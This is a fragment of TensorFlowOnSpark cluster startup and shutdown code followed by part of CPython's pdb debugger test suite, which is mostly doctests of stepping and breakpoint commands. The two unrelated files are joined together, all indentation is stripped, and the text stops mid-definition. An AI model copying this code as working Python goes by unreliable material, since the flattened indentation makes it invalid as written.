# to complete all tasks, while accounting for any PS tasks which run indefinitely.
count = 0
while count < 3:
st = self.sc.statusTracker()
jobs = st.getActiveJobsIds()
if len(jobs) == 0:
break
stages = st.getActiveStageIds()
for i in stages:
si = st.getStageInfo(i)
if si.numActiveTasks == len(ps_list):
# if we only have PS tasks left, check that we see this condition a couple times
count += 1
time.sleep(5)
# shutdown queues and managers for "worker" executors.
# note: in SPARK mode, this job will immediately queue up behind the "data feeding" job.
# in TENSORFLOW mode, this will only run after all workers have finished.
workers = len(worker_list)
workerRDD = self.sc.parallelize(range(workers), workers)
workerRDD.foreachPartition(TFSparkNode.shutdown(self.cluster_info, self.queues))
# exit Spark application w/ err status if TF job had any errors
if 'error' in tf_status:
logging.error("Exiting Spark application with error status.")
self.sc.cancelAllJobs()
self.sc.stop()
sys.exit(1)
logging.info("Shutting down cluster")
# shutdown queues and managers for "PS" executors.
# note: we have to connect/shutdown from the spark driver, because these executors are "busy" and won't accept any other tasks.
for node in ps_list:
addr = node['addr']
authkey = node['authkey']
m = TFManager.connect(addr, authkey)
q = m.get_queue('control')
q.put(None)
q.join()
# wait for all jobs to finish
while True:
time.sleep(5)
st = self.sc.statusTracker()
jobs = st.getActiveJobsIds()
if len(jobs) == 0:
break
def tensorboard_url(self):
"""Utility function to get the Tensorboard URL"""
for node in self.cluster_info:
if node['tb_port'] != 0:
return "http://{0}:{1}".format(node['host'], node['tb_port'])
return None
def run(sc, map_fun, tf_args, num_executors, num_ps, tensorboard=False, input_mode=InputMode.TENSORFLOW,
log_dir=None, driver_ps_nodes=False, master_node=None, reservation_timeout=600, queues=['input', 'output', 'error']):
"""Starts the TensorFlowOnSpark cluster and Runs the TensorFlow "main" function on the Spark executors
Args:
:sc: SparkContext
:map_fun: user-supplied TensorFlow "main" function
:tf_args: ``argparse`` args, or command-line ``ARGV``. These will be passed to the ``map_fun``.
:num_executors: number of Spark executors. This should match your Spark job's ``--num_executors``.
:num_ps: number of Spark executors which are reserved for TensorFlow PS nodes. All other executors will be used as TensorFlow worker nodes.
:tensorboard: boolean indicating if the chief worker should spawn a Tensorboard server.
:input_mode: TFCluster.InputMode
:log_dir: directory to save tensorboard event logs. If None, defaults to a fixed path on local filesystem.
:driver_ps_nodes: run the PS nodes on the driver locally instead of on the spark executors; this help maximizing computing resources (esp. GPU). You will need to set cluster_size = num_executors + num_ps
:master_node: name of the "master" or "chief" node in the cluster_template, used for `tf.estimator` applications.
:reservation_timeout: number of seconds after which cluster reservation times out (600 sec default)
:queues: *INTERNAL_USE*
Returns:
A TFCluster object representing the started cluster.
"""
logging.info("Reserving TFSparkNodes {0}".format("w/ TensorBoard" if tensorboard else ""))
assert(num_ps < num_executors)
if driver_ps_nodes and input_mode != InputMode.TENSORFLOW:
raise Exception('running PS nodes on driver locally is only supported in InputMode.TENSORFLOW')
# build a cluster_spec template using worker_nums
cluster_template = {}
cluster_template['ps'] = range(num_ps)
if master_node is None:
cluster_template['worker'] = range(num_ps, num_executors)
else:
cluster_template[master_node] = range(num_ps, num_ps + 1)
if num_executors > num_ps + 1:
cluster_template['worker'] = range(num_ps + 1, num_executors)
logging.info("cluster_template: {}".format(cluster_template))
# get default filesystem from spark
defaultFS = sc._jsc.hadoopConfiguration().get("fs.defaultFS")
# strip trailing "root" slash from "file:///" to be consistent w/ "hdfs://..."
if defaultFS.startswith("file://") and len(defaultFS) > 7 and defaultFS.endswith("/"):
defaultFS = defaultFS[:-1]
# get current working dir of spark launch
working_dir = os.getcwd()
# start a server to listen for reservations and broadcast cluster_spec
server = reservation.Server(num_executors)
server_addr = server.start()
# start TF nodes on all executors
logging.info("Starting TensorFlow on executors")
cluster_meta = {
'id': random.getrandbits(64),
'cluster_template': cluster_template,
'num_executors': num_executors,
'default_fs': defaultFS,
'working_dir': working_dir,
'server_addr': server_addr
}
if driver_ps_nodes:
nodeRDD = sc.parallelize(range(num_ps, num_executors), num_executors - num_ps)
else:
nodeRDD = sc.parallelize(range(num_executors), num_executors)
if driver_ps_nodes:
def _start_ps(node_index):
logging.info("starting ps node locally %d" % node_index)
TFSparkNode.run(map_fun,
tf_args,
cluster_meta,
tensorboard,
log_dir,
queues,
background=(input_mode == InputMode.SPARK))([node_index])
for i in cluster_template['ps']:
ps_thread = threading.Thread(target=lambda: _start_ps(i))
ps_thread.daemon = True
ps_thread.start()
# start TF on a background thread (on Spark driver) to allow for feeding job
def _start(status):
try:
nodeRDD.foreachPartition(TFSparkNode.run(map_fun,
tf_args,
cluster_meta,
tensorboard,
log_dir,
queues,
background=(input_mode == InputMode.SPARK)))
except Exception as e:
logging.error("Exception in TF background thread")
status['error'] = str(e)
t = threading.Thread(target=_start, args=(tf_status,))
# run as daemon thread so that in spark mode main thread can exit
# if feeder spark stage fails and main thread can't do explicit shutdown
t.daemon = True
t.start()
# wait for executors to register and start TFNodes before continuing
logging.info("Waiting for TFSparkNodes to start")
cluster_info = server.await_reservations(sc, tf_status, reservation_timeout)
logging.info("All TFSparkNodes started")
# print cluster_info and extract TensorBoard URL
tb_url = None
for node in cluster_info:
logging.info(node)
if node['tb_port'] != 0:
tb_url = "http://{0}:{1}".format(node['host'], node['tb_port'])
if tb_url is not None:
logging.info("========================================================================================")
logging.info("")
logging.info("TensorBoard running at: {0}".format(tb_url))
logging.info("")
logging.info("========================================================================================")
# since our "primary key" for each executor's TFManager is (host, executor_id), sanity check for duplicates
# Note: this may occur if Spark retries failed Python tasks on the same executor.
tb_nodes = set()
for node in cluster_info:
node_id = (node['host'], node['executor_id'])
if node_id in tb_nodes:
raise Exception("Duplicate cluster node id detected (host={0}, executor_id={1})".format(node_id[0], node_id[1]) +
"Please ensure that:\n" +
"1. Number of executors >= number of TensorFlow nodes\n" +
"2. Number of tasks per executors is 1\n" +
"3, TFCluster.shutdown() is successfully invoked when done.")
else:
tb_nodes.add(node_id)
# create TFCluster object
cluster = TFCluster()
cluster.sc = sc
cluster.meta = cluster_meta
cluster.nodeRDD = nodeRDD
cluster.cluster_info = cluster_info
cluster.cluster_meta = cluster_meta
cluster.input_mode = input_mode
cluster.queues = queues
cluster.server = server
return cluster
|
test_pdb.py | # A test suite for pdb; not very comprehensive at the moment.
import doctest
import pdb
import sys
import types
import unittest
import subprocess
import textwrap
from test import support
# This little helper class is essential for testing pdb under doctest.
from test.test_doctest import _FakeInput
class PdbTestInput(object):
"""Context manager that makes testing Pdb in doctests easier."""
def __init__(self, input):
self.input = input
def __enter__(self):
self.real_stdin = sys.stdin
sys.stdin = _FakeInput(self.input)
self.orig_trace = sys.gettrace() if hasattr(sys, 'gettrace') else None
def __exit__(self, *exc):
sys.stdin = self.real_stdin
if self.orig_trace:
sys.settrace(self.orig_trace)
def test_pdb_displayhook():
"""This tests the custom displayhook for pdb.
>>> def test_function(foo, bar):
... import pdb; pdb.Pdb(nosigint=True).set_trace()
... pass
>>> with PdbTestInput([
... 'foo',
... 'bar',
... 'for i in range(5): print(i)',
... 'continue',
... ]):
... test_function(1, None)
> <doctest test.test_pdb.test_pdb_displayhook[0]>(3)test_function()
-> pass
(Pdb) foo
1
(Pdb) bar
(Pdb) for i in range(5): print(i)
0
1
2
3
4
(Pdb) continue
"""
def test_pdb_basic_commands():
"""Test the basic commands of pdb.
>>> def test_function_2(foo, bar='default'):
... print(foo)
... for i in range(5):
... print(i)
... print(bar)
... for i in range(10):
... never_executed
... print('after for')
... print('...')
... return foo.upper()
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True).set_trace()
... ret = test_function_2('baz')
... print(ret)
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'step', # entering the function call
... 'args', # display function args
... 'list', # list function source
... 'bt', # display backtrace
... 'up', # step up to test_function()
... 'down', # step down to test_function_2() again
... 'next', # stepping to print(foo)
... 'next', # stepping to the for loop
... 'step', # stepping into the for loop
... 'until', # continuing until out of the for loop
... 'next', # executing the print(bar)
... 'jump 8', # jump over second for loop
... 'return', # return out of function
... 'retval', # display return value
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_basic_commands[1]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) args
foo = 'baz'
bar = 'default'
(Pdb) list
1 -> def test_function_2(foo, bar='default'):
2 print(foo)
3 for i in range(5):
4 print(i)
5 print(bar)
6 for i in range(10):
7 never_executed
8 print('after for')
9 print('...')
10 return foo.upper()
[EOF]
(Pdb) bt
...
<doctest test.test_pdb.test_pdb_basic_commands[2]>(18)<module>()
-> test_function()
<doctest test.test_pdb.test_pdb_basic_commands[1]>(3)test_function()
-> ret = test_function_2('baz')
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) up
> <doctest test.test_pdb.test_pdb_basic_commands[1]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) down
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) next
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(2)test_function_2()
-> print(foo)
(Pdb) next
baz
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(3)test_function_2()
-> for i in range(5):
(Pdb) step
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(4)test_function_2()
-> print(i)
(Pdb) until
0
1
2
3
4
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(5)test_function_2()
-> print(bar)
(Pdb) next
default
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(6)test_function_2()
-> for i in range(10):
(Pdb) jump 8
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(8)test_function_2()
-> print('after for')
(Pdb) return
after for
...
--Return--
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(10)test_function_2()->'BAZ'
-> return foo.upper()
(Pdb) retval
'BAZ'
(Pdb) continue
BAZ
"""
def test_pdb_breakpoint_commands():
"""Test basic commands related to breakpoints.
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True).set_trace()
... print(1)
... print(2)
... print(3)
... print(4)
First, need to clear bdb state that might be left over from previous tests.
Otherwise, the new breakpoints might get assigned different numbers.
>>> from bdb import Breakpoint
>>> Breakpoint.next = 1
>>> Breakpoint.bplist = {}
>>> Breakpoint.bpbynumber = [None]
Now test the breakpoint commands. NORMALIZE_WHITESPACE is needed because
the breakpoint list outputs a tab for the "stop only" and "ignore next"
lines, which we don't want to put in here.
>>> with PdbTestInput([ # doctest: +NORMALIZE_WHITESPACE
... 'break 3',
... 'disable 1',
... 'ignore 1 10',
... 'condition 1 1 < 2',
... 'break 4',
... 'break 4',
... 'break',
... 'clear 3',
... 'break',
... 'condition 1',
... 'enable 1',
... 'clear 1',
... 'commands 2',
... 'p "42"',
... 'print("42", 7*6)', # Issue 18764 (not about breakpoints)
... 'end',
... 'continue', # will stop at breakpoint 2 (line 4)
... 'clear', # clear all!
... 'y',
... 'tbreak 5',
... 'continue', # will stop at temporary breakpoint
... 'break', # make sure breakpoint is gone
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(3)test_function()
-> print(1)
(Pdb) break 3
Breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) disable 1
Disabled breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) ignore 1 10
Will ignore next 10 crossings of breakpoint 1.
(Pdb) condition 1 1 < 2
New condition set for breakpoint 1.
(Pdb) break 4
Breakpoint 2 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break 4
Breakpoint 3 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break
Num Type Disp Enb Where
1 breakpoint keep no at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
stop only if 1 < 2
ignore next 10 hits
2 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
3 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) clear 3
Deleted breakpoint 3 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break
Num Type Disp Enb Where
1 breakpoint keep no at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
stop only if 1 < 2
ignore next 10 hits
2 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) condition 1
Breakpoint 1 is now unconditional.
(Pdb) enable 1
Enabled breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) clear 1
Deleted breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) commands 2
(com) p "42"
(com) print("42", 7*6)
(com) end
(Pdb) continue
1
'42'
42 42
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(4)test_function()
-> print(2)
(Pdb) clear
Clear all breaks? y
Deleted breakpoint 2 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) tbreak 5
Breakpoint 4 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:5
(Pdb) continue
2
Deleted breakpoint 4 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:5
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(5)test_function()
-> print(3)
(Pdb) break
(Pdb) continue
3
4
"""
def do_nothing():
pass
def do_something():
print(42)
def test_list_commands():
"""Test the list and source commands of pdb.
>>> def test_function_2(foo):
... import test.test_pdb
... test.test_pdb.do_nothing()
... 'some...'
... 'more...'
... 'code...'
... 'to...'
... 'make...'
... 'a...'
... 'long...'
... 'listing...'
... 'useful...'
... '...'
... '...'
... return foo
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True).set_trace()
... ret = test_function_2('baz')
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'list', # list first function
... 'step', # step into second function
... 'list', # list second function
... 'list', # continue listing to EOF
... 'list 1,3', # list specific lines
... 'list x', # invalid argument
... 'next', # step to import
... 'next', # step over import
... 'step', # step into do_nothing
... 'longlist', # list all lines
... 'source do_something', # list all lines of function
... 'source fooxxx', # something that doesn't exit
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_list_commands[1]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) list
1 def test_function():
2 import pdb; pdb.Pdb(nosigint=True).set_trace()
3 -> ret = test_function_2('baz')
[EOF]
(Pdb) step
--Call--
> <doctest test.test_pdb.test_list_commands[0]>(1)test_function_2()
-> def test_function_2(foo):
(Pdb) list
1 -> def test_function_2(foo):
2 import test.test_pdb
3 test.test_pdb.do_nothing()
4 'some...'
5 'more...'
6 'code...'
7 'to...'
8 'make...'
9 'a...'
10 'long...'
11 'listing...'
(Pdb) list
12 'useful...'
13 '...'
14 '...'
15 return foo
[EOF]
(Pdb) list 1,3
1 -> def test_function_2(foo):
2 import test.test_pdb
3 test.test_pdb.do_nothing()
(Pdb) list x
*** ...
(Pdb) next
> <doctest test.test_pdb.test_list_commands[0]>(2)test_function_2()
-> import test.test_pdb
(Pdb) next
> <doctest test.test_pdb.test_list_commands[0]>(3)test_function_2()
-> test.test_pdb.do_nothing()
(Pdb) step
--Call--
> ...test_pdb.py(...)do_nothing()
-> def do_nothing():
(Pdb) longlist
... -> def do_nothing():
... pass
(Pdb) source do_something
... def do_something():
... print(42)
(Pdb) source fooxxx
*** ...
(Pdb) continue
"""
def test_post_mortem():
"""Test post mortem traceback debugging.
>>> def test_function_2():
... try:
... 1/0
... finally:
... print('Exception!')
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True).set_trace()
... test_function_2()
... print('Not reached.')
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'next', # step over exception-raising call
... 'bt', # get a backtrace
... 'list', # list code of test_function()
... 'down', # step into test_function_2()
... 'list', # list code of test_function_2()
... 'continue',
... ]):
... try:
... test_function()
... except ZeroDivisionError:
... print('Correctly reraised.')
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
(Pdb) next
Exception!
ZeroDivisionError: division by zero
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
(Pdb) bt
...
<doctest test.test_pdb.test_post_mortem[2]>(10)<module>()
-> test_function()
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
<doctest test.test_pdb.test_post_mortem[0]>(3)test_function_2()
-> 1/0
(Pdb) list
1 def test_function():
2 import pdb; pdb.Pdb(nosigint=True).set_trace()
3 -> test_function_2()
4 print('Not reached.')
[EOF]
(Pdb) down
> <doctest test.test_pdb.test_post_mortem[0]>(3)test_function_2()
-> 1/0
(Pdb) list
1 def test_function_2():
2 try:
3 >> 1/0
4 finally:
5 -> print('Exception!')
[EOF]
(Pdb) continue
Correctly reraised.
"""
def test_pdb_skip_modules():
"""This illustrates the simple case of module skipping.
>>> def skip_module():
... import string
... import pdb; pdb.Pdb(skip=['stri*'], nosigint=True).set_trace()
... string.capwords('FOO')
>>> with PdbTestInput([
... 'step',
... 'continue',
... ]):
... skip_module()
> <doctest test.test_pdb.test_pdb_skip_modules[0]>(4)skip_module()
-> string.capwords('FOO')
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules[0]>(4)skip_module()->None
-> string.capwords('FOO')
(Pdb) continue
"""
# Module for testing skipping of module that makes a callback
mod = types.ModuleType('module_to_skip')
exec('def foo_pony(callback): x = 1; callback(); return None', mod.__dict__)
def test_pdb_skip_modules_with_callback():
"""This illustrates skipping of modules that call into other code.
>>> def skip_module():
... def callback():
... return None
... import pdb; pdb.Pdb(skip=['module_to_skip*'], nosigint=True).set_trace()
... mod.foo_pony(callback)
>>> with PdbTestInput([
... 'step',
... 'step',
... 'step',
... 'step',
... 'step',
... 'continue',
... ]):
... skip_module()
... pass # provides something to "step" to
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(5)skip_module()
-> mod.foo_pony(callback)
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(2)callback()
-> def callback():
(Pdb) step
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(3)callback()
-> return None
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(3)callback()->None
-> return None
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(5)skip_module()->None
-> mod.foo_pony(callback)
(Pdb) step
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[1]>(10)<module>()
-> pass # provides something to "step" to
(Pdb) continue
"""
def test_pdb_continue_in_bottomframe():
"""Test that "continue" and "next" work properly in bottom frame (issue #5294).
>>> def test_function():
... import pdb, sys; inst = pdb.Pdb(nosigint=True)
... inst.set_trace()
... inst.botframe = sys._getframe() # hackery to get the right botframe
... print(1)
... print(2)
... print(3)
... print(4)
>>> with PdbTestInput([ # doctest: +ELLIPSIS
... 'next',
... 'break 7',
... 'continue',
... 'next',
... 'continue',
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(4)test_function()
-> inst.botframe = sys._getframe() # hackery to get the right botframe
(Pdb) next
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(5)test_function()
-> print(1)
(Pdb) break 7
Breakpoint ... at <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>:7
(Pdb) continue
1
2
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(7)test_function()
-> print(3)
(Pdb) next
3
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(8)test_function()
-> print(4)
(Pdb) continue
4
"""
def pdb_invoke(method, arg):
"""Run pdb.method(arg)."""
import pdb
getattr(pdb.Pdb(nosigint=True), method)(arg)
def test_pdb_run_with_incorrect_argument():
"""Testing run and runeval with incorrect first argument.
>>> pti = PdbTestInput(['continue',])
>>> with pti:
... pdb_invoke('run', lambda x: x)
Traceback (most recent call last):
TypeError: exec() arg 1 must be a string, bytes or code object
>>> with pti:
... pdb_invoke('runeval', lambda x: x)
Traceback (most recent call last):
TypeError: eval() arg 1 must be a string, bytes or code object
"""
def test_pdb_run_with_code_object():
"""Testing run and runeval with code object as a first argument.
>>> with PdbTestInput(['step','x', 'continue']): # doctest: +ELLIPSIS
... pdb_invoke('run', compile('x=1', '<string>', 'exec'))
> <string>(1)<module>()...
(Pdb) step
--Return--
> <string>(1)<module>()->None
(Pdb) x
1
(Pdb) continue
>>> with PdbTestInput(['x', 'continue']):
... x=0
... pdb_invoke('runeval', compile('x+1', '<string>', 'eval'))
> <string>(1)<module>()->None
(Pdb) x
1
(Pdb) continue
"""
def test_next_until_return_at_return_event():
"""Test that pdb stops after a next/until/return issued at a return debug event.
>>> def test_function_2():
... x = 1
... x = 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True).set_trace()
... test_function_2()
... test_function_2()
... test_function_2()
... end = 1
>>> from bdb import Breakpoint
>>> Breakpoint.next = 1
>>> with PdbTestInput(['break test_function_2',
... 'continue',
... 'return',
... 'next',
... 'continue',
... 'return',
... 'until',
... 'continue',
... 'return',
... 'return',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(3)test_function()
-> test_function_2()
(Pdb) break test_function_2
Breakpoint 1 at <doctest test.test_pdb.test_next_until_return_at_return_event[0]>:1
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) next
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(4)test_function()
-> test_function_2()
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) until
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(5)test_function()
-> test_function_2()
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) return
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(6)test_function()
-> end = 1
(Pdb) continue
"""
def test_pdb_next_command_for_generator():
"""Testing skip unwindng stack on yield for generators for "next" command
>>> def test_gen():
... yield 0
... return 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True).set_trace()
... it = test_gen()
... try:
... assert next(it) == 0
... next(it)
... except StopIteration as ex:
... assert ex.value == 1
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'step',
... 'next',
... 'next',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(3)test_function()
-> it = test_gen()
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(4)test_function()
-> try:
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(5)test_function()
-> assert next(it) == 0
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(2)test_gen()
-> yield 0
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(3)test_gen()
-> return 1
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(3)test_gen()->1
-> return 1
(Pdb) step
StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(6)test_function()
-> next(it)
(Pdb) continue
finished
"""
def test_pdb_return_command_for_generator():
"""Testing no unwindng stack on yield for generators
for "return" command
>>> def test_gen():
... yield 0
... return 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True).set_trace()
... it = test_gen()
... try:
... assert next(it) == 0
... next(it)
... except StopIteration as ex:
... assert ex.value == 1
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'step',
... 'return',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(3)test_function()
-> it = test_gen()
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(4)test_function()
-> try:
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(5)test_function()
-> assert next(it) == 0
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_return_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) return
StopIteration: 1
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(6)test_function()
-> next(it)
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(7)test_function()
-> except StopIteration as ex:
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(8)test_function()
-> assert ex.value == 1
(Pdb) continue
finished
"""
def test_pdb_until_command_for_generator():
"""Testing no unwindng stack on yield for generators
for "until" command if target breakpoing is not reached
>>> def test_gen():
... yield 0
... yield 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True).set_trace()
... for i in test_gen():
... print(i)
... print("finished")
>>> with PdbTestInput(['step',
... 'until 4',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_until_command_for_generator[1]>(3)test_function()
-> for i in test_gen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) until 4
0
1
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(4)test_gen()
-> yield 2
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(4)test_gen()->2
-> yield 2
(Pdb) step
> <doctest test.test_pdb.test_pdb_until_command_for_generator[1]>(4)test_function()
-> print(i)
(Pdb) continue
2
finished
"""
def test_pdb_next_command_in_generator_for_loop():
"""The next command on returning from a generator controled by a for loop.
>>> def test_gen():
... yield 0
... return 1
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True).set_trace()
... for i in test_gen():
... print('value', i)
... x = 123
>>> with PdbTestInput(['break test_gen',
... 'continue',
... 'next',
... 'next',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(3)test_function()
-> for i in test_gen():
(Pdb) break test_gen
Breakpoint 6 at <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>:1
(Pdb) continue
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>(2)test_gen()
-> yield 0
(Pdb) next
value 0
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>(3)test_gen()
-> return 1
(Pdb) next
Internal StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(3)test_function()
-> for i in test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(5)test_function()
-> x = 123
(Pdb) continue
"""
def test_pdb_next_command_subiterator():
"""The next command in a generator with a subiterator.
>>> def test_subgenerator():
... yield 0
... return 1
>>> def test_gen():
... x = yield from test_subgenerator()
... return x
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True).set_trace()
... for i in test_gen():
... print('value', i)
... x = 123
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'next',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(3)test_function()
-> for i in test_gen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(1)test_gen()
-> def test_gen():
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(2)test_gen()
-> x = yield from test_subgenerator()
(Pdb) next
value 0
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(3)test_gen()
-> return x
(Pdb) next
Internal StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(3)test_function()
-> for i in test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(5)test_function()
-> x = 123
(Pdb) continue
"""
class PdbTestCase(unittest.TestCase):
def run_pdb(self, script, commands):
"""Run 'script' lines with pdb and the pdb 'commands'."""
filename = 'main.py'
with open(filename, 'w') as f:
f.write(textwrap.dedent(script))
self.addCleanup(support.unlink, filename)
self.addCleanup(support.rmtree, '__pycache__')
cmd = [sys.executable, '-m', 'pdb', filename]
stdout = stderr = None
with subprocess.Popen(cmd, stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
) as proc:
stdout, stderr = proc.communicate(str.encode(commands))
stdout = stdout and bytes.decode(stdout)
stderr = stderr and bytes.decode(stderr)
return stdout, stderr
def _assert_find_function(self, file_content, func_name, expected):
file_content = textwrap.dedent(file_content)
with open(support.TESTFN, 'w') as f:
f.write(file_content)
expected = None if not expected else (
expected[0], support.TESTFN, expected[1])
self.assertEqual(
expected, pdb.find_function(func_name, support.TESTFN))
def test_find_function_empty_file(self):
self._assert_find_function('', 'foo', None)
def test_find_function_found(self):
self._assert_find_function(
"""\
def foo():
pass
def bar():
pass
def quux():
pass
""",
'bar',
('bar', 4),
)
def test_issue7964(self):
